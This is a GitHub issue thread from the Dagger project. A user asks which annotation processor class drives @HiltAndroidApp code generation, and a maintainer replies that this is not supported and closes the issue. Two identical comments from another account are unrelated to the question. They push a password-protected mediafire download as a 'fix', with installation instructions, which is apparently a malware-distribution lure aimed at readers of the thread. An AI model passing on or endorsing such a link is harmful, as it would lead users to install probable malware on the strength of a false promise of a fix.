### ISSUE TITLE
What's the entrance for HiltAndrodApp compiler

### ISSUE THREAD

**Issue by betaHi** [google/dagger#4424]
Hi,  since this [issue](https://github.com/google/dagger/issues/4420), I'm trying to build `@HiltAndroidApp` manually with the help of  `hilt-android-compiler-2.51.jar`, and is `dagger.hilt.android.processor.internal.androidentrypoint.AndroidEntryPointProcessor` the entrance class?  I want to use a `@AutoService({Processor.class})` Processor class that could help to build `@HiltAndroidApp`, thanks very much.

![image](https://github.com/user-attachments/assets/6315d564-fdb3-46e4-adda-d79ff74783dd)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by betaHi** [comment]
And I use `dagger.hilt.android.processor.internal.androidentrypoint.AndroidEntryPointProcessor` to build `@AndroidEntryPoint` for activity could compile successfully and get `Hilt_XXXActivity`, but build `@HiltAndroidApp` had never succeeded and `Hilt_XXXApplication` was not generated. :(

**Comment by bcorso** [comment]
Hi @betaHi, we don't support this sort of thing yet.

I'll close this out and we'll provide an update in #4420.
